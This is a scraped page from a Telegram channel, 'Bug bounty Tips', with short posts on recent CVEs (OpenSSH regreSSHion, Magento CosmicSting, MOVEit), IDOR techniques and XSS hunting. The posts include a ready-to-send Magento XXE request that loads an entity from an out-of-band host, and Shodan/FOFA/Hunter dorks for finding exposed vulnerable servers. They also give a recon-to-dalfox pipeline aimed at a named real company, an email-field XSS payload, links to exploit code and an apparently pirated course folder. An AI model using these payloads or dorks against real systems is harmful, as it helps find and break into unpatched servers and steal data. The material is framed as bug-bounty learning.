Bug bounty Tips
Открыть в Telegram
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Больше6 037
Подписчики
+1224 часа
+717 дней
+32530 день
Архив постов
6 036
🖼️ RegreSSHion — OpenSSH Unauthenticated RCE
The Qualys Threat Research Unit has discovered a Remote Unauthenticated Code Execution vulnerability in OpenSSH’s server (sshd) in glibc-based Linux systems. CVE assigned to this vulnerability is CVE-2024-6387.
The vulnerability, which is a signal handler race condition in OpenSSH’s server (sshd), allows unauthenticated remote code execution (RCE) as root on glibc-based Linux systems.
🔗 Research:
https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server
🔗 PoC:
https://github.com/7etsuo/cve-2024-6387-poc
#openssh #glibc #rce #cve
6 036
🔥Magento XXE CVE-2024-34102: A newly discovered vulnerability
dubbed “CosmicSting” jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.
⚠️CosmicSting enables attackers to gain unauthorized access
to sensitive files, including those containing passwords.
When combined with a recent Linux bug (CVE-2024-2961),
the vulnerability can be escalated to remote code execution.
📣Dorks:
Hunter: http://product.name="Adobe Magento"
FOFA: app="Adobe-Magento"
SHODAN: http.html:"magento-template"
▶️Video POC: https://youtu.be/rDs_Qj7K31M
🔴POC: https://github.com/th3gokul/CVE-2024-34102
⛔️Payload:
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2 Content-Type: application/json Content-Length: 192 {"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData": {"data":"http://*.oastify.com/xxe.xml","dataIsURL":true,"options":12345678}}}}}}⚠️Tool Made By: D. Sanjai Kumar & Gokul V
6 036
⚡️Burp Suite for Pentester
ℹ️This cheat sheet is built for Bug Bounty Hunters and penetration testers to help them hunt the vulnerabilities. It is designed such that beginners can understand the fundamentals and professionals can brush up their skills with the advanced options.
🔹 Web Scanner & Crawler
🔹Fuzzing with Intruder (Part3)
🔹Fuzzing with Intruder (Part2)
🔹Fuzzing with Intruder (Part1)
🔹XSS Validator
🔹Configuring Proxy
🔹Burp Collaborator
🔹HackBar
🔹Burp Sequencer
🔹Turbo Intruder
🔹Engagement Tools
🔹Payload Processing Rule (Part2)
🔹Payload Processing Rule (Part1)
🔹Beginners Guide to Burpsuite Payloads (Part2)
🔹Beginners Guide to Burpsuite Payloads (Part1)
🔹Encoder & Decoder Tutorial
🔹Active Scan++
🔹Software Vulnerability Scanner
🔹Burp’s Project Management
🔹Repeater
🔗Link: https://github.com/Ignitetechnologies/BurpSuite-For-Pentester
🔖#infosec #cybersecurity #hacking #pentesting #security
6 036
Guys happy to anounce that i want working on an automated recon to XSS tool to day i completed and was able to successfully execute it. so i request you guys to check and lets me know you thoughts and please do share the tool and support me and also happy for more contribution on the tool.
https://github.com/Adwaithsheety/Auto_xss
6 036
100 web vulnerabilities, interactive mind maps hope you guys like this. if yes give a lot of reactions please.
6 036
Advanced IDORs - 9 Techniques by Intigriti:
1. Exploiting Basic IDORs
How to: Modify a predictable numeric ID in the request URL or parameters.
Example: GET /user/email?userId=1002 (change userId to another value).
2. Exploiting IDORs via Parameter Pollution
How to: Inject multiple instances of the same parameter in the request.
Example: POST /update_profile with user_id=1234&user_id=5678.
3. Exploiting IDORs via JSON Globbing
How to: Manipulate JSON fields with arrays, booleans, wildcards, or large integers.
Example: { "user_id": ["1234", "5678"] } or { "user_id": "*" }.
4. Exploiting Method-Based IDORs
How to: Change the HTTP method to bypass access controls.
Example: Change GET /user/data to POST /user/data.
5. Exploiting Content-Type-Based IDORs
How to: Alter the Content-Type header to manipulate request processing.
Example: Use Content-Type: application/json instead of Content-Type: text/plain.
6. Exploiting IDORs via Deprecated API Versions
How to: Use older API versions that may lack updated security checks.
Example: Access /v1/user/data instead of /v2/user/data.
7. Exploiting IDORs in APIs that Use Static Keywords
How to: Replace keywords like current or me with numerical user IDs.
Example: Change /user/profile/current to /user/profile/1002.
8. Exploiting IDORs that Require Unpredictable IDs
How to: Find references to UUIDs or hashes in other parts of the application.
Example: Extract UUID from profile URLs like /profile/123e4567-e89b-12d3-a456-426614174000.
9. Exploiting Second-Order IDOR Vulnerabilities
How to: Manipulate stored IDs used in subsequent processes.
Example: Submit a form that stores your ID, then trigger an export process that retrieves data using that stored ID.
----------------------------------------------------------
I've never seen real-world examples for some of them, but they are definitely worth the try.
#pentesting #appsec #bugbounty #cybersecurity
Here's the full scoop: https://buff.ly/3zfhhzL
6 036
Find xss with this automation of the following work :
1. subfinder -d indeed.com -o indeed.txt //Find Subdomains
2. httpx -l subdomains.txt -o httpx.txt // Live Subdomains
3. echo "indeed.com" | gau --threads 5 >> Enpoints.txt // Find Endpoints
4. cat httpx.txt | katana -jc >> Enpoints.txt // Find More Endpoints
5. cat Enpoints.txt | uro >> Endpoints_F.txt // Remove Duplicates
6. cat Endpoints_F.txt | gf xss >> XSS.txt // Filter Endpoints for XSS
7. cat XSS.txt | Gxss -p khXSS -o XSS_Ref.txt // Find reflected Parameters
8. dalfox file XSS_Ref.txt -o Vulnerable_XSS.txt // Find XSS
Script : https://github.com/dirtycoder0124/xss
6 036
Tips 🌿🌻🍂
whenever you saw any email input field!
70% bug hunters don't try XSS there as compared to name field.
always try this in email input field!
"<img/src/onerror=alert(0)"@xss.com
This don't work every time but give it a try found 2 XSS today using this!
Tips 🌿🌻🍂 👆
6 036
IDOR TIPS~
Always try to find hidden parameters for this endpoints using Arjun, Parameth, etc.
Endpoints:-
/settings/profile
/user/profile
/user/settings
/account/settings
/username
/profile
And any similar endpoints.
#bugbounty #BugBountyTip #CyberSecurity #hackers #infosec
6 036
Malware reverse engineering for beginners.
Part 1: https://intezer.com/blog/malware-analysis/malware-reverse-engineering-beginners/
Part 2: https://intezer.com/blog/incident-response/malware-reverse-engineering-for-beginners-part-2/
6 036
Ethical Hacking Masterclass
Contains every single thing you need to know from zero level to advanced. It's very comprehensive.
Size: 56.1 GB
Link: https://drive.google.com/drive/folders/1mZwaNmPJB6OcGf-lSejIvbU8y2YxjDt4
6 036
Auth. Bypass In (Un)Limited Scenarios - Progress MOVEit Transfer (CVE-2024-5806)
CVSS: 9.1 (CRITICAL) Improper Authentication vulnerability in Progress MOVEit Transfer (SFTP module) can lead to Authentication Bypass.
Exploit: https://github.com/watchtowrlabs/watchTowr-vs-progress-moveit_CVE-2024-5806
This issue affects MOVEit Transfer:
from 2023.0.0 before 2023.0.11,
from 2023.1.0 before 2023.1.6,
from 2024.0.0 before 2024.0.2.
Query:
Hunter: /product.name="MOVEit Transfer"
FOFA: app="Progress-MOVEit"
SHODAN: product:"MOVEit Transfer"
